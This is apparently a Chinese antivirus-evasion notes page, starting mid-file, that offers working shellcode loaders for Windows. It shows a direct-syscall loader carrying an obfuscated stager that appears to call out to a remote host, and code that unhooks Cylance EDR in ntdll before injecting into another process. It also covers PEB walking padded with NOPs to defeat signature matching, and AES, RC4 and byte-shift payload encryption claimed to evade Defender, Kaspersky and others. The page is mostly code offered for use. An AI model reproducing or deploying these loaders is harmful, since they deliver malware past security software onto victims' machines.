  78.     pContext->SegGs = KGDT64_R3_DATA | RPL_MASK;
  79.     pContext->SegEs = KGDT64_R3_DATA | RPL_MASK;
  80.     pContext->SegDs = KGDT64_R3_DATA | RPL_MASK;
  81.     pContext->SegCs = KGDT64_R3_CODE | RPL_MASK;
  82.     pContext->SegSs = KGDT64_R3_DATA | RPL_MASK;
  83.     pContext->SegFs = KGDT64_R3_CMTEB | RPL_MASK;
  85.     return STATUS_SUCCESS;
  86. }
  89. BOOL IsElevated() {
  90.     BOOL fRet = FALSE;
  91.     HANDLE hToken = NULL;
  92.     if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
  93.         TOKEN_ELEVATION Elevation = { 0 };
  94.         DWORD cbSize = sizeof(TOKEN_ELEVATION);
  95.         if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
  96.             fRet = Elevation.TokenIsElevated;
  97.         }
  98.     }
  99.     if (hToken) {
  100.         CloseHandle(hToken);
  101.     }
  102.     return fRet;
  103. }
  105. BOOL SetDebugPrivilege() {
  106.     HANDLE hToken = NULL;
  107.     TOKEN_PRIVILEGES TokenPrivileges = { 0 };
  109.     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
  110.         return FALSE;
  111.     }
  113.     TokenPrivileges.PrivilegeCount = 1;
  114.     TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
  116.     LPWSTR lpwPriv = L"SeDebugPrivilege";
  117.     if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
  118.         CloseHandle(hToken);
  119.         return FALSE;
  120.     }
  122.     if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
  123.         CloseHandle(hToken);
  124.         return FALSE;
  125.     }
  127.     CloseHandle(hToken);
  128.     return TRUE;
  129. }
  132. int wmain(int argc, wchar_t* argv[]) {
  134.     // 仅支持64位系统
  135.     if (sizeof(LPVOID) != 8) {
  136.         exit(1);
  137.     }
  138.     //判断是否为管理员权限
  139.     if (!IsElevated()) {
  140.         exit(1);
  141.     }
  143.     SetDebugPrivilege();
  145.     PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
  147.     // 获取版本信息
  148.     OSVERSIONINFOEXW osInfo;
  149.     LPWSTR lpOSVersion;
  150.     osInfo.dwOSVersionInfoSize = sizeof(osInfo);
  152.     _RtlGetVersion RtlGetVersion = (_RtlGetVersion)
  153.         GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
  154.     if (RtlGetVersion == NULL) {
  155.         return FALSE;
  156.     }
  158.     wprintf(L"[1] Checking OS version details:\n");
  159.     RtlGetVersion(&osInfo);
  160.     swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
  161.     pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
  163.     if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
  164.         lpOSVersion = L"10 or Server 2016";
  165.         wprintf(L"    [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
  166.         wprintf(L"    [+] Mapping version specific System calls.\n");
  167.         NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
  168.         ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
  169.         NtCreateThread = &NtCreateThread10;
  170.         pWinVerInfo->SystemCall = 0x3F;
  171.     }
  172.     else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
  173.         lpOSVersion = L"7 SP1 or Server 2008 R2";
  174.         wprintf(L"    [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
  175.         wprintf(L"    [+] Mapping version specific System calls.\n");
  176.         NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
  177.         ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
  178.         NtCreateThread = &NtCreateThread7SP1;
  179.         pWinVerInfo->SystemCall = 0x3C;
  180.     }
  181.     else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
  182.         lpOSVersion = L"8 or Server 2012";
  183.         wprintf(L"    [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
  184.         exit(1);
  185.         wprintf(L"    [+] Mapping version specific System calls.\n");
  186.         pWinVerInfo->SystemCall = 0x3D;
  187.     }
  188.     else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
  189.         lpOSVersion = L"8.1 or Server 2012 R2";
  190.         wprintf(L"    [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
  191.         wprintf(L"    [+] Mapping version specific System calls.\n");
  192.         NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
  193.         ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
  194.         NtCreateThread = &NtCreateThread81;
  195.         pWinVerInfo->SystemCall = 0x3E;
  196.     }
  197.     else {
  198.         wprintf(L"    [!] OS Version not supported.\n\n");
  199.         exit(1);
  200.     }
  202.     /*
  203.     Shellcode 每三个字节替换成\x00 进行加密
  204.     */
  205.     unsigned char data[] = "\x00\xe8\x89\x00\x00\x00\x00\x89\xe5\x00\xd2\x64\x00\x52\x30\x00\x52\x0c\x00\x52\x14\x00\x72\x28\x00\xb7\x4a\x00\x31\xff\x00\xc0\xac\x00\x61\x7c\x00\x2c\x20\x00\xcf\x0d\x00\xc7\xe2\x00\x52\x57\x00\x52\x10\x00\x42\x3c\x00\xd0\x8b\x00\x78\x85\x00\x74\x4a\x00\xd0\x50\x00\x48\x18\x00\x58\x20\x00\xd3\xe3\x00\x49\x8b\x00\x8b\x01\x00\x31\xff\x00\xc0\xac\x00\xcf\x0d\x00\xc7\x38\x00\x75\xf4\x00\x7d\xf8\x00\x7d\x24\x00\xe2\x58\x00\x58\x24\x00\xd3\x66\x00\x0c\x4b\x00\x58\x1c\x00\xd3\x8b\x00\x8b\x01\x00\x89\x44\x00\x24\x5b\x00\x61\x59\x00\x51\xff\x00\x58\x5f\x00\x8b\x12\x00\x86\x5d\x00\x6e\x65\x00\x00\x68\x00\x69\x6e\x00\x54\x68\x00\x77\x26\x00\xff\xd5\x00\x00\x00\x00\x00\x31\x00\x57\x57\x00\x57\x57\x00\x3a\x56\x00\xa7\xff\x00\xe9\xa4\x00\x00\x00\x00\x31\xc9\x00\x51\x6a\x00\x51\x51\x00\xbb\x01\x00\x00\x53\x00\x68\x57\x00\x9f\xc6\x00\xd5\x50\x00\x8c\x00\x00\x00\x5b\x00\xd2\x52\x00\x00\x32\x00\x84\x52\x00\x52\x53\x00\x50\x68\x00\x55\x2e\x00\xff\xd5\x00\xc6\x83\x00\x50\x68\x00\x33\x00\x00\x89\xe0\x00\x04\x50\x00\x1f\x56\x00\x75\x46\x00\x86\xff\x00\x5f\x31\x00\x57\x57\x00\xff\x53\x00\x68\x2d\x00\x18\x7b\x00\xd5\x85\x00\x0f\x84\x00\x01\x00\x00\x31\xff\x00\xf6\x74\x00\x89\xf9\x00\x09\x68\x00\xc5\xe2\x00\xff\xd5\x00\xc1\x68\x00\x21\x5e\x00\xff\xd5\x00\xff\x57\x00\x07\x51\x00\x50\x68\x00\x57\xe0\x00\xff\xd5\x00\x00\x2f\x00\x00\x39\x00\x75\x07\x00\x50\xe9\x00\xff\xff\x00\x31\xff\x00\x91\x01\x00\x00\xe9\x00\x01\x00\x00\xe8\x6f\x00\xff\xff\x00\x77\x42\x00\x6d\x00\x00\x42\xc6\x00\x6f\xba\x00\x3d\xd8\x00\xfc\x47\x00\xbc\xdc\x00\xe5\xb9\x00\x57\x1e\x00\xe6\xd9\x00\x4f\x31\x00\x37\x66\x00\x69\xf2\x00\xae\xf8\x00\x5d\xde\x00\x53\x49\x00\x59\x04\x00\x49\x62\x00\x1d\x70\x00\xd4\xcb\x00\x66\x6d\x00\x06\x5b\x00\xe8\xc7\x00\xf2\xcf\x00\xa7\x75\x00\x9a\xb0\x00\x00\x55\x00\x65\x72\x00\x41\x67\x00\x6e\x74\x00\x20\x4d\x00\x7a\x69\x00\x6c\x61\x00\x34\x2e\x00\x20\x28\x00\x6f\x6d\x00\x61\x74\x00\x62\x6c\x00\x3b\x20\x00\x53\x49\x00\x20\x37\x00\x30\x3b\x00\x57\x69\x00\x64\x6f\x00\x73\x20\x00\x54\x20\x00\x2e\x31\x00\x20\x54\x00\x69\x64\x00\x6e\x74\x00\x34\x2e\x00\x29\x0d\x00\x00\x65\x00\x75\x9d\x00\x44\xb7\x00\xc6\x44\x00\xdc\xc8\x00\x94\xf1\x00\x08\x48\x00\xac\xac\x00\xf0\xfa\x00\xf4\x24\x00\x95\xec\x00\xbe\x97\x00\x01\x5e\x00\x85\x66\x00\xd3\x11\x00\xd8\xb5\x00\x4b\x87\x00\x84\x9f\x00\x50\x09\x00\x54\x1b\x00\xc0\x50\x00\x75\xd9\x00\xa2\x05\x00\x23\x9d\x00\x5b\x20\x00\xf3\x86\x00\x3b\x9f\x00\x07\x77\x00\xa0\x8a\x00\x5a\x87\x00\x64\xd1\x00\xcf\xe2\x00\xa1\x26\x00\xdb\x63\x00\xca\x11\x00\x48\x45\x00\x5c\x05\x00\x42\x1e\x00\x9a\x23\x00\xb0\xe7\x00\xfa\x35\x00\xf4\xe3\x00\x31\xe0\x00\xcd\x8f\x00\xf8\x14\x00\x0f\x89\x00\x03\xa2\x00\xce\x2b\x00\x5f\x57\x00\x32\xac\x00\x3e\xad\x00\xa8\xc8\x00\x66\x01\x00\x6c\xa9\x00\x36\xed\x00\xa2\x57\x00\x95\x06\x00\x9b\x07\x00\xc4\x02\x00\x44\xf0\x00\x9e\x36\x00\x6f\xdf\x00\x33\xce\x00\xa9\xce\x00\xce\x0a\x00\xf4\xb9\x00\x5c\xae\x00\x23\xce\x00\xac\x8f\x00\x09\x85\x00\x37\xb9\x00\x25\x6b\x00\x38\xe3\x00\xda\xd9\x00\x96\x1c\x00\x0c\x00\x00\xf0\xb5\x00\x56\xff\x00\x6a\x40\x00\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x00\xa4\x53\x00\xff\xd5\x00\xb9\x00\x00\x00\x00\x00\xd9\x51\x00\x89\xe7\x00\x68\x00\x00\x00\x00\x00\x56\x68\x00\x96\x89\x00\xff\xd5\x00\xc0\x74\x00\x8b\x07\x00\xc3\x85\x00\x75\xe5\x00\xc3\xe8\x00\xfd\xff\x00\x31\x30\x00\x2e\x31\x00\x2e\x31\x00\x36\x2e\x00\x37\x00\x00\x00\x00\x00";
  206.     char a1[] = "\xfc\x00\x60\x31\x8b\x8b\x8b\x8b\x0f\x26\x31\x3c\x02\xc1\x01\xf0\x8b\x8b\x01\x40\xc0\x01\x8b\x8b\x01\x3c\x34\xd6\x31\xc1\x01\xe0\x03\x3b\x75\x8b\x01\x8b\x8b\x01\x04\xd0\x24\x5b\x5a\xe0\x5a\xeb\x68\x74\x77\x69\x4c\x07\xe8\x00\xff\x57\x68\x79\xd5\x00\x5b\x51\x03\x68\x00\x50\x89\xff\xe9\x00\x31\x68\xc0\x52\x52\xeb\x3b\x89\xc3\x80\x00\x6a\x6a\x68\x9e\xd5\xff\x6a\x56\x06\xff\xc0\xca\x00\x85\x04\xeb\xaa\x5d\x89\x45\x31\x31\x6a\x56\xb7\x0b\xbf\x00\xc7\x58\x7b\xff\xe9\x00\xc9\x00\xff\x2f\x36\x8b\x20\xaf\xf5\xe9\xb6\xf5\x9b\x86\xbc\x09\x77\x40\x33\x2e\x1a\x31\x64\x02\xb6\x09\x07\xd3\x48\xa8\x73\x2d\x65\x3a\x6f\x6c\x2f\x30\x63\x70\x69\x65\x4d\x45\x2e\x20\x6e\x77\x4e\x35\x3b\x72\x65\x2f\x30\x0a\x1b\xb1\xb6\x11\xa7\x6e\x13\xc6\x3d\x5d\x24\x53\xc2\x36\x91\xfe\x53\x5a\x64\x3b\x31\x02\xf1\x0e\x22\x54\xa9\x33\x03\xa4\x27\x4e\xd9\x6b\xdc\x2f\x09\x3c\x3b\x8d\x26\x74\x43\x03\x83\x66\xc9\x1c\x0e\x9a\xef\x2b\x10\x15\xaf\x89\x8c\x1f\xcb\x51\x5c\xc1\x7a\xed\x94\x2b\x50\x72\x5c\x52\xc5\x97\x1b\xb3\x5c\x68\xa2\xd5\x68\x00\x00\x00\x58\xe5\x93\x00\x01\x53\x57\x20\x53\x12\xe2\x85\xc6\x01\xc0\x58\x89\xff\x33\x30\x39\x33\x00\x06";
  208.     SIZE_T Size = sizeof(data);
  209.     for (int i = 0; i < sizeof(a1); i++) {
  210.         memcpy(&data[i * 3], &a1[i], 1);
  211.     }
  213.     PVOID lpvAddr = NULL;
  214.     NTSTATUS status;
  216.     status = NtAllocateVirtualMemory(GetCurrentProcess(), &lpvAddr, 0, &Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  217.     RtlMoveMemory(lpvAddr, data, sizeof(data));
  219.     HANDLE ThreadHandle = NULL;
  220.     CONTEXT NewThreadContext = { 0 };
  221.     INITIAL_TEB InitialTeb = { 0 };
  222.     OBJECT_ATTRIBUTES ObjAttr2 = { 0 };
  223.     CLIENT_ID ReturnTid = { 0 };
  225.     if (MyInitTeb(&InitialTeb) != 0) {
  226.         return -1;
  227.     }
  229.     if (MyInitContext(
  230.         &NewThreadContext,
  231.         (PVOID)lpvAddr,
  232.         NULL,
  233.         InitialTeb.StackBase) != 0)
  234.     {
  235.         return -1;
  236.     }
  237.     InitializeObjectAttributes(&ObjAttr2, NULL, 0, NULL, NULL);
  238.     status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpvAddr, &Size, PAGE_EXECUTE, &OldProtection);
  240.     status = NtCreateThread(
  241.         &ThreadHandle,
  242.         THREAD_ALL_ACCESS,
  243.         &ObjAttr2,
  244.         GetCurrentProcess(),
  245.         &ReturnTid,
  246.         &NewThreadContext,
  247.         &InitialTeb,
  248.         FALSE);
  250.     WaitForSingleObject(ThreadHandle, INFINITE);
  251.     //ULONG OldProtection;
  252.     //status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpvAddr, &Size, PAGE_EXECUTE, &OldProtection);
  254.     //HANDLE s;
  255.     //s = CreateThread(0, 0, lpvAddr, NULL, 0, 0);
  257.     //WaitForSingleObject(s, INFINITE);
  258.     return 0;
  259. }

Unhook EDR

杀软会 hook 关键函数, 可以修改函数的头部来脱钩 另外 可以使用系统直接调用, 绕过杀软对一些脱钩过程中使用的函数的 hook

https://www.mdsec.co.uk/2019/03/silencing-cylance-a-case-study-in-modern-edrs/ Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图6
 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图7
 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图8

  1. //demo
  2. #include <iostream>
  3. #include <windows.h>
  4. unsigned char buf[] =
  5. "SHELLCODE_GOES_HERE";
  6. struct syscall_table {
  7.     int osVersion;
  8. };
  9. // Remove Cylance hook from DLL export
  10. void removeCylanceHook(const char *dll, const char *apiName, char code) {
  11.     DWORD old, newOld;
  12.     void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
  13.     printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
  14.     VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old);
  15.     printf("[*] Unhooking Cylance\n");
  16.     memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4);
  17.     *((char *)procAddress + 4) = code;
  18.     VirtualProtect(procAddress, 10, old, &newOld);
  19. }
  21. int main(int argc, char **argv)
  22. {
  23.     if (argc != 2) {
  24.         printf("Usage: %s PID\n", argv[0]);
  25.         return 2;
  26.     }
  27.     DWORD processID = atoi(argv[1]);
  28.     HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
  29.     if (proc == INVALID_HANDLE_VALUE) {
  30.         printf("[!] Error: Could not open target process: %d\n", processID);
  31.         return 1;
  32.     }
  33.     printf("[*] Opened target process %d\n", processID);
  34.     printf("[*] Allocating memory in target process with VirtualAllocEx\n");
  35.     void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  36.     if (alloc == (void*)0) {
  37.         printf("[!] Error: Could not allocate memory in target process\n");
  38.         return 1;
  39.     }
  40.     printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc);
  41.     printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
  42.     if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
  43.         printf("[!] Error: Could not write to target process memory\n");
  44.         return 1;
  45.     }
  46.     printf("[*] WriteProcessMemory successful\n");
  48.     // Remove the NTDLL.DLL hook added by userland DLL
  49.     removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);
  50.     printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
  51.     HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
  52.     printf("[*] Success :D\n");
  53. }

动态调用 API 函数

  1. void* ntAllocateVirtualMemory = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtAllocateVirtualMemory");

https://4hou.win/wordpress/?cat=612

通过动态调用 API 函数的方式来调用 virtualalloc 函数。具体的做法是, load kernel32.dll 库,使用汇编语言从 kernel32 库中取得 virtualalloc 函数在内存中的地址,然后执行。 另外, 假设 Loadlibrary 函数也被 hook 了 (这也太硬核了), 我们也可以从 PEB 中获取函数地址, 下面代码 demo 为 Load kernel32.dll, 再有甚者, 对机器码做了模式匹配, 我们可以在代码中加入一些 nop 指令或者一些正常功能的垃圾混淆代码。

  1. //HMODULE hModule =LoadLibrary(_T("Kernel32.dll"));
  2. HMODULE hModule = NULL;
  4. //LoadLibrary 记得从中加入一些nop指令(空指令雪橇)
  5. //空指令雪橇原理: 针对机器码匹配的话基本是进行模式匹配的
  6.     __asm {
  8.         mov esi, fs: [0x30]//得到PEB地址
  9.      nop
  10.      nop
  11.         mov esi, [esi + 0xc]//指向PEB_LDR_DATA结构的首地址
  12.         mov esi, [esi + 0x1c]//一个双向链表的地址
  13.         mov esi, [esi]//得到第二个条目kernelBase的链表
  14.         mov esi, [esi]//得到第三个条目kernel32链表(win10)
  15.         mov esi, [esi + 0x8] //kernel32.dll地址
  16.         mov hModule, esi
  17.     }
  19. HANDLE shellcode_handler;
  20. FARPROC Address = GetProcAddress(hModule,"VirtualAlloc");//拿到virtualalloc的地址
  21. _asm
  22. {
  23.       push 40h  //push传参
  24.       push 1000h
  25.       push 29Ah
  26.       push 0
  27.       call Address  //函数调用
  28.       mov shellcode_handler, eax
  29. }
  30. memcpy(shellcode_handler, newshellcode,sizeof newshellcode);
  31. ((void(*)())shellcode_handler)();

垃圾混淆代码 —-nop nop 空指令雪橇

  1. _asm {
  2. mov esi, fs:[0x30]//得到PEB地址
  3. NOP
  4. NOP
  5. NOP
  6. NOP
  7. NOP
  8. mov esi, [esi + 0xc]//指向PEB_LDR_DATA结构的首地址
  9. NOP
  10. NOP
  11. NOP
  12. NOP
  13. mov esi, [esi + 0x1c]//一个双向链表的地址
  14. NOP
  15. NOP
  16. NOP
  17. NOP
  18. mov esi, [esi]//得到第二个条目kernelBase的链表
  19. NOP
  20. NOP
  21. NOP
  22. mov esi, [esi]//得到第三个条目kernel32链表(win10)
  23. NOP
  24. NOP
  25. mov esi, [esi + 0x8] //kernel32.dll地址
  26. NOP
  27. NOP
  28. mov hModule, esi
  29. }

父进程欺骗

Windows 10 进程镂空技术

https://4hou.win/wordpress/?p=20680

Process Doppelgänging

https://www.4hou.com/technology/9379.html https://juejin.im/entry/5be26746e51d456a09717c9a

Encrypt

AES

//encrypt

  1. using System;
  2. using System.Collections.Generic;
  3. using System.IO;
  4. using System.Linq;
  5. using System.Security.Cryptography;
  6. using System.Text;
  8. public static class Encrypt{
  9.     static byte[] KEY = null;
  10.     static byte[] IV = null;
  11.     static byte[] payload = null;
  13.     private static byte[] EncryptBytes(IEnumerable<byte> bytes){
  14.         //The ICryptoTransform is created for each call to this method as the MSDN documentation indicates that the public methods may not be thread-safe and so we cannot hold a static reference to an instance
  15.         using (var r = Rijndael.Create()){
  16.             using (var encryptor = r.CreateEncryptor(KEY, IV)){
  17.                 return Transform(bytes, encryptor);
  18.             }
  19.         }
  20.     }
  21.     private static byte[] DecryptBytes(IEnumerable<byte> bytes)
  22.     {
  23.         //The ICryptoTransform is created for each call to this method as the MSDN documentation indicates that the public methods may not be thread-safe and so we cannot hold a static reference to an instance
  24.         using (var r = Rijndael.Create())
  25.         {
  26.             using (var decryptor = r.CreateDecryptor(KEY, IV))
  27.             {
  28.                 return Transform(bytes, decryptor);
  29.             }
  30.         }
  31.     }
  32.     private static byte[] Transform(IEnumerable<byte> bytes, ICryptoTransform transform){
  33.         using (var stream = new MemoryStream()){
  34.             using (var cryptoStream = new CryptoStream(stream, transform, CryptoStreamMode.Write)){
  35.                 foreach (var b in bytes)
  36.                     cryptoStream.WriteByte(b);
  37.             }
  39.             return stream.ToArray();
  40.         }
  41.     }
  42.     public static class Encryption_Class
  43.     {
  44.         public static string Encrypt(string key, string data){
  45.             Encoding unicode = Encoding.Unicode;
  47.             return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
  48.         }
  50.         public static string Decrypt(string key, string data){
  51.             Encoding unicode = Encoding.Unicode;
  53.             return unicode.GetString(Encrypt(unicode.GetBytes(key), Convert.FromBase64String(data)));
  54.         }
  56.         public static byte[] Encrypt(byte[] key, byte[] data){
  57.             return EncryptOutput(key, data).ToArray();
  58.         }
  60.         public static byte[] Decrypt(byte[] key, byte[] data){
  61.             return EncryptOutput(key, data).ToArray();
  62.         }
  64.         private static byte[] EncryptInitalize(byte[] key){
  65.             byte[] s = Enumerable.Range(0, 256)
  66.               .Select(i => (byte)i)
  67.               .ToArray();
  68.             for (int i = 0, j = 0; i < 256; i++){
  69.                 j = (j + key[i % key.Length] + s[i]) & 255;
  71.                 Swap(s, i, j);
  72.             }
  73.             return s;
  74.         }
  76.         private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
  77.         {
  78.             byte[] s = EncryptInitalize(key);
  79.             int i = 0;
  80.             int j = 0;
  81.             return data.Select((b) =>{
  82.                 i = (i + 1) & 255;
  83.                 j = (j + s[i]) & 255;
  84.                 Swap(s, i, j);
  85.                 return (byte)(b ^ s[(s[i] + s[j]) & 255]);
  86.             });
  87.         }
  88.         private static void Swap(byte[] s, int i, int j){
  89.             byte c = s[i];
  90.             s[i] = s[j];
  91.             s[j] = c;
  92.         }
  93.     }
  94. }

//decrypt

  1. string Payload_Encrypted;
  2. Payload_Encrypted = "240,222,148,160,253,139,204,128,168,11,132,74";
  3. string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
  4. byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
  5. for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
  6. {
  7.     byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
  8.     _X_to_Bytes[i] = current;
  9. }
  10. byte[] KEY = { 0x11, 0x22, 0x21, 0x00, 0x33, 0x01, 0xd0, 0x00, 0x00, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
  11. byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);
  13. UInt32 funcAddr = VirtualAlloc(0, (UInt32)Finall_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  14. Marshal.Copy(Finall_Payload, 0, (IntPtr)(funcAddr), Finall_Payload.Length);
  15. IntPtr hThread = IntPtr.Zero;
  16. UInt32 threadId = 0;
  17. IntPtr pinfo = IntPtr.Zero;
  18. uint lpflOldProtect = 0x01;
  19. VirtualProtect((IntPtr)(funcAddr), (UInt32)Finall_Payload.Length, 0x10, lpflOldProtect);
  20. /// execute native code
  21. hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
  22. WaitForSingleObject(hThread, 0xFFFFFFFF);

shellcode 字节替换

xor

crypt1337

bypass 360 火绒 电脑管家 defender NOD32 ~ 卡巴斯基~

  1. //encrypt
  2. using System;
  3. using System.Text;
  5. namespace cryprt1337encrypt
  6. {
  7.     class Program
  8.     {
  9.         static void Main(string[] args)
  10.         {
  11.             byte[] buf = new byte[835] { xxxx };
  12.             String s;
  13.             s = l337CryptPlusPlus(buf);
  14.             Console.WriteLine(s);
  15.         }
  16.         private static string l337CryptPlusPlus(byte[] buf)
  17.         {
  18.             StringBuilder lolbuf = new StringBuilder();
  19.             lolbuf.Append("byte[] hahabuf = new byte[");
  20.             lolbuf.Append(buf.Length);
  21.             lolbuf.Append("]{ ");
  23.             byte[] bufclone = (byte[])buf.Clone();
  24.             for (int i = 0; i < buf.Length; i++)
  25.             {
  26.                 for (int n = 0; n < i; n++)
  27.                 {
  28.                     bufclone[i]++;
  29.                 }
  30.                 lolbuf.Append("0x");
  31.                 lolbuf.AppendFormat("{0:x2}", bufclone[i]);
  32.                 if (i < buf.Length - 1)
  33.                     lolbuf.Append(", ");
  34.             }
  35.             lolbuf.Append(" };");
  36.             return lolbuf.ToString();
  37.         }
  38.     }
  39. }
  1. //decrypt
  2. using System;
  3. using System.Text;
  4. using System.Runtime.InteropServices;
  6. private static byte[] l337deCryptPlusPlus(byte[] buf)
  7. {
  8.     StringBuilder lolbuf = new StringBuilder();
  10.     byte[] bufclone = (byte[])buf.Clone();
  11.     for (int i = 0; i < buf.Length; i++)
  12.     {
  13.         for (int n = 0; n < i; n++)
  14.         {
  15.             bufclone[i]--;
  16.         }
  17.     }
  18.     return bufclone;
  19. }

完整版

  1. //加密shellcode
  2. using System;
  3. using System.Text;
  5. namespace cryprt1337encrypt
  6. {
  7.     class Program
  8.     {
  9.         static void Main(string[] args)
  10.         {
  11.             byte[] buf = new byte[835] { xxxx };
  12.             String s;
  13.             s = l337CryptPlusPlus(buf);
  14.             Console.WriteLine(s);
  15.         }
  16.         private static string l337CryptPlusPlus(byte[] buf)
  17.         {
  18.             StringBuilder lolbuf = new StringBuilder();
  19.             lolbuf.Append("byte[] hahabuf = new byte[");
  20.             lolbuf.Append(buf.Length);
  21.             lolbuf.Append("]{ ");
  23.             byte[] bufclone = (byte[])buf.Clone();
  24.             for (int i = 0; i < buf.Length; i++)
  25.             {
  26.                 for (int n = 0; n < i; n++)
  27.                 {
  28.                     bufclone[i]++;
  29.                 }
  30.                 lolbuf.Append("0x");
  31.                 lolbuf.AppendFormat("{0:x2}", bufclone[i]);
  32.                 if (i < buf.Length - 1)
  33.                     lolbuf.Append(", ");
  34.             }
  35.             lolbuf.Append(" };");
  36.             return lolbuf.ToString();
  37.         }
  38.     }
  39. }
  41. // 输入加密的shellcode,编译exe
  42. using System;
  43. using System.Text;
  44. using System.Runtime.InteropServices;
  47. namespace crypt1337
  48. {
  49.     class Program
  50.     {
  51.         const int SW_HIDE = 0;
  52.         const int SW_SHOW = 5;
  53.         private static UInt32 MEM_COMMIT = 0x1000;
  54.         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
  55.         static void Main(string[] args)
  56.         {
  57.             byte[] haha = new byte[835] { encrypt_shellcode };
  58.             byte[] heihei = l337deCryptPlusPlus(haha);
  60.             UInt32 funcAddr = VirtualAlloc(0, (UInt32)heihei.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  61.             Marshal.Copy(heihei, 0, (IntPtr)(funcAddr), heihei.Length);
  62.             IntPtr hThread = IntPtr.Zero;
  63.             UInt32 threadId = 0;
  64.             IntPtr pinfo = IntPtr.Zero;
  65.             uint lpflOldProtect = 0x01;
  66.             VirtualProtect((IntPtr)(funcAddr), (UInt32)heihei.Length, 0x10, lpflOldProtect);
  67.             /// execute native code
  68.             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
  69.             WaitForSingleObject(hThread, 0xFFFFFFFF);
  70.         }
  71.         private static byte[] l337deCryptPlusPlus(byte[] buf)
  72.         {
  73.             StringBuilder lolbuf = new StringBuilder();
  75.             byte[] bufclone = (byte[])buf.Clone();
  76.             for (int i = 0; i < buf.Length; i++)
  77.             {
  78.                 for (int n = 0; n < i; n++)
  79.                 {
  80.                     bufclone[i]--;
  81.                 }
  82.             }
  83.             return bufclone;
  84.         }
  86.         [DllImport("kernel32")]
  87.         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  88.         [DllImport("kernel32")]
  89.         public static extern Boolean VirtualProtect(IntPtr lpAddress, UInt32 dwSize, uint flNewProtect, uint lpflOldProtect);
  90.         [DllImport("kernel32")]
  91.         private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
  92.         [DllImport("kernel32")]
  93.         private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
  94.         [DllImport("kernel32")]
  95.         private static extern bool CloseHandle(IntPtr handle);
  96.         [DllImport("kernel32")]
